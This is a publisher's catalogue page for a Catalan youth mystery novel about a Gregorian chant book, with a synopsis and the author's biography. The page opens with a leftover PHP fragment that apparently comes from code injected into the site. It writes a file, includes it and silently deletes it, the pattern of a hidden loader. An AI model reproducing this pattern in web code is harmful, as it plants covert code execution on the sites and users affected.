");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - El misteri del llibre de cant gregorià
Cercador d'Obres
ORDENAR:
Començar recerca

El misteri del llibre de cant gregorià

Estelrich i Massutí, Pere

Col·lecció:
Magatzem Can Toni
Tema:
Creació
Pàgines:
150
PVP:
14.00
ISBN:
978-84-16163-90-8
Data d'Edició:
20/05/2017
Intriga, aventures i misteri que ens guiaran pel camí de la música.
Sinopsi
Un home singular contacta amb dues joves de 12 anys per descobrir l’enigma que envolta un llibre de música tot ignorant que hi ha un altre personatge misteriós que pretén obtenir el volum.
La història és plena d’aventures i cada capítol conté una intriga que convida a continuar llegint.
Una novel·la juvenil per a tots els públics que ens acosta a la història de la música.

Veure el Sumari.
Pere Estelrich i Massutí
Va néixer a Felanitx l’abril de 1955. Estudià el batxillerat a l’Institut de la seva ciutat i es llicencià en matemàtiques per la Universitat de Barcelona. Té un màster en Periodisme i Comunicació i un diploma en gestió cultural a ESADE. Ha treballat com a professor al col·legi Sant Gaietà de Palma, fou gerent de la Fundació Pública de les Balears per a la Música i assessora diversos festivals i cicles musicals de Mallorca.

La seva activitat se centra, sobretot, en el camp de l’organització de concerts, però també ha organitzat moltes activitats d’una altra mena.

Actualment és col·laborador del Diario de Mallorca i forma part de l’equip del programa de ràdio El crepuscle encén estels, ara a Ona Mediterrània.

Ha publicat Suggeriments (2017), entrevistes a 40 representants de la cultura balear, la novel·la per a joves El misteri del llibre de cant gregorià (2017) i Estels (2019).
Recomanar
Comentar
Comentaris (0)